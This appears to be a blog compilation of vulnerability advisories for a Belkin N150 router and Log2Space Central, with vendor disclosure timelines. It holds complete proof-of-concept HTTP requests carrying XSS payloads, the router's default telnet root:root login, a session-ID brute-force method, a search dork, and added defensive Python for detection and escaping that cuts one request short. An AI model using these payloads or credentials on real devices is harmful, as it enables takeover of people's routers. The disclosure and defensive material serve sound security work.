Belkin N150 Router Multiple XSS Vulnerabilities

## FULL DISCLOSURE

#Product : Belkin N150 Home Router
#Exploit Author : Rahul Pratap Singh
#Home page Link : http://www.belkin.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Version : F9K1009 v1
#Firmware : 1.00.09
#Date : 24/Feb/2016

→ Vulnerability/Bug Report:

—————————————-
Description:
—————————————-
The Belkin N150 Home Router is vulnerable to cross-site scripting (XSS): numerous parameters are reflected into the response without sanitization, which leads to XSS.

—————————————-
Vulnerable Code:
—————————————-
[screenshots of the vulnerable code: belkinsessionxssvulcode, belkinxsspocvulcode, vul8]

—————————————-
Exploit and Poc:
—————————————-
1)
GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo
Cookie: sessionid="></a><img src=x onerror=alert(1)><a; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us
Connection: keep-alive

[screenshot: belkinsessionxsspoc]

2)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

getpage=html%2Fpage.html&errorpage=<script>alert("xss")</script>&var%3Apage=deviceinfo&var%3Aerrorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3Aaction=login&%3Asessionid=3921960f

[screenshot: belkinxsspoc2]

3)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

getpage=html/page.html&errorpage=html/page.html&var:page="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:sessionid=3921960f

[screenshot: belkinxsspoc3]

4)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245

getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:sessionid=3921960f

[screenshot: belkinxsspoc4]

5)
GET /cgi-bin/webproc?getpage=<scRipt>prompt("xss")</scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage=ut_firmware HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[screenshot: belkinxsspoc5]

6)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[screenshot: belkinxsspoc6]

7)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[screenshot: belkinxsspoc7]

8)
GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[screenshot: belkinxsspoc8]

9)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:CacheLastData="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:sessionid=3921960f

[screenshot: belkinxsspoc9]

10)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:sessionid=3921960f

[screenshot: belkinxsspoc10]

11)
GET /cgi-bin/webproc?getpage=html/page.html&var:style="</scRipt><scRipt>prompt("xss")</scRipt><scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[screenshot: belkinxsspoc11]
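As an added example (my code, not code from the advisory or from Belkin's firmware): detection logic for the reflected-XSS pattern shown in the requests above, run over constructed requests that mirror PoC 1 and PoC 2, together with the output encoding the firmware omits for these parameters. The endpoint path and parameter names are taken from the requests above; the sample requests themselves are constructed.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory shows being reflected unencoded by /cgi-bin/webproc;
# the sessionid cookie is reflected as well (PoC 1).
REFLECTED = {"getpage", "errorpage", "sessionid", "var:page", "var:errorpage",
             "var:menu", "var:subpage", "var:tbsversion", "var:CacheLastData",
             "var:sys_UserLevel", "var:style"}

# Markup fragments used in the PoCs; case-insensitive because of "scRipt".
MARKUP = re.compile(r"<\s*/?\s*script|<\s*img|</\s*a\s*>|\bonerror\s*=", re.I)


def suspicious_params(target: str, body: str = "", cookie: str = "") -> list:
    """Return (name, value) pairs that carry markup into a reflected parameter.

    target: request target as logged, e.g. "/cgi-bin/webproc?getpage=..."
    body:   urlencoded POST body, if any; cookie: raw Cookie header, if any
    """
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/webproc":
        return []
    # parse_qsl percent-decodes, so "var%3Apage" and "var:page" compare equal.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    for item in cookie.split(";"):
        name, _, value = item.strip().partition("=")
        pairs.append((name, unquote(value)))
    return [(n, v) for n, v in pairs if n in REFLECTED and MARKUP.search(v)]


def safe_reflect(value: str) -> str:
    """Encode a value before echoing it into HTML text or a quoted attribute;
    this is the encoding the firmware omits for the parameters above."""
    return html.escape(value, quote=True)


# Constructed samples mirroring PoC 1 (cookie), PoC 2 (POST body) and a benign
# status-page load; the payload strings are the ones shown in the advisory.
SAMPLES = [
    ("/cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo", "",
     'sessionid="></a><img src=x onerror=alert(1)><a; auth=ok'),
    ("/cgi-bin/webproc", 'getpage=html%2Fpage.html&errorpage=<script>alert("xss")'
     '</script>&var%3Apage=deviceinfo&var%3Aerrorpage=login', ""),
    ("/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login",
     "", "sessionid=3921960f; auth=ok"),
]


def scan_samples() -> list:
    """Names of the flagged parameters for each sample request."""
    return [[n for n, _ in suspicious_params(*s)] for s in SAMPLES]
```

Feed `suspicious_params` the target, body and Cookie header of each request in an access log or proxy capture; a non-empty result on a request to the router's web interface is the signal to alert on, and `safe_reflect` is the one-line fix at the point where the firmware echoes the value.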

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to Belkin Security Team
→ February 24, 2016  – No response from vendor
→ February 24, 2016  – Full Disclosure

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Log2Space Central v 6.2 Multiple XSS Vulnerability

## FULL DISCLOSURE

#Product    : Log2Space Central
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.2
#Dork        : "Powered by Spacecom Technologies Ltd"

#Date         : 27/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "invID, login, UserName, DayFrom, MonthFrom, YearFrom, DayTo, MonthTo, YearTo, usage" parameters are not sanitized, which leads to reflected XSS.

—————————————-
Exploit:
—————————————-
Send the following POST request (unauthenticated):

POST /cgi/login.php

txtLogin=xss&txtLoginPass=xss&Submit=Login&invID="/><img src=x onerror=alert(1)>"&recID=

Send the following GET request (authenticated):

GET /cgi/activation.php?pageRef=user&login="/><img%20src=x%20onerror=alert(1)>%20"

—————————————-
POC:
—————————————-
[screenshot: ualog2spacecentralxss]

Fix:
According to the vendor, this version is already patched.

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to Vendor
→ January 19, 2015  – Vendor acknowledged, version already patched (reported server not updated)
→ January 19, 2015  – Vendor asked for the affected server IP.
→ January 20, 2015  – Affected server IP, reported.
→ January 25, 2015  – Affected Server Patched.

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Belkin N150 Router Multiple Vulnerabilities

Full Disclosure:
Recently, I encountered some vulnerabilities in the Belkin N150 Router. Reported it to the vendor and haven't got any reply from the Belkin Security Team.

→ Vulnerability/Bug Report:

1)
• Vulnerability Title : HTML/Script Injection
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

The "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" parameter is vulnerable.

[screenshot: 1_vul_code]

→ Steps to Reproduce:

Send the following POST request using Burp Suite or a similar tool:

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language=">alert("1")<script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title : Session Hijacking
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

The sessionid is a hex-encoded value of fixed length, i.e. 8 characters. Therefore it ranges only from 00000000 to ffffffff and can be brute-forced in a feasible amount of time.

→ Steps to Reproduce:

Send the following request using Burp Suite and brute-force the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
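As an added illustration of the session-id weakness described above (my code, not part of the advisory): a check that infers how large a session-ID scheme is from observed cookie values, applied to the two sessionid values visible in this post, next to the way a properly random ID would be minted. The 64-bit threshold and the independence-of-positions assumption are mine.

```python
import math
import secrets
import string

# Below this many bits, enumerating the whole ID space is practical; 128 bits
# is the usual target for session identifiers (assumed threshold).
MIN_BITS = 64

# Candidate alphabets, smallest first; the first one covering every sample wins.
ALPHABETS = ("0123456789", "0123456789abcdef",
             string.ascii_letters + string.digits)


def id_bits(sample_ids: list) -> float:
    """Upper bound on the entropy of a fixed-length session-ID scheme,
    inferred from observed values (assumes every position is independent)."""
    lengths = {len(s) for s in sample_ids}
    if len(lengths) != 1:
        raise ValueError("variable-length IDs; inspect by hand")
    seen = set("".join(sample_ids))
    for alphabet in ALPHABETS:
        if seen <= set(alphabet):
            return lengths.pop() * math.log2(len(alphabet))
    raise ValueError("unrecognised alphabet")


def assess(sample_ids: list) -> dict:
    """Summarise the scheme: bits, expected guesses to hit one live session
    (half the space, assuming a single valid ID exists), and a verdict."""
    bits = id_bits(sample_ids)
    return {"bits": bits, "expected_guesses": 2 ** (bits - 1),
            "weak": bits < MIN_BITS}


def mint_session_id(nbytes: int = 16) -> str:
    """How the router should allocate IDs: 16 bytes from the OS CSPRNG,
    hex-encoded (32 characters, 128 bits), so enumeration is infeasible."""
    return secrets.token_hex(nbytes)


# The two sessionid values visible in this post's requests.
OBSERVED = ["7cf2e9c5", "3921960f"]
```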

3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Vulnerability Details:

The Telnet service can be used by an attacker to gain remote access to the router with root privileges.

→ Proof of Concept:

[screenshot: 3_telnet]

→ Steps to Reproduce:

1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) The default username and password are root:root

4)
• Vulnerability Title : Cross Site Request Forgery
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Requests don't contain any CSRF token, so they can be forged. This can be verified with any request.

Public ref:
http://www.securityfocus.com/archive/1/537000/30/0/threaded
https://packetstormsecurity.com/files/134564/Belkin-N150-XSS-CSRF-Session-Hijacking.html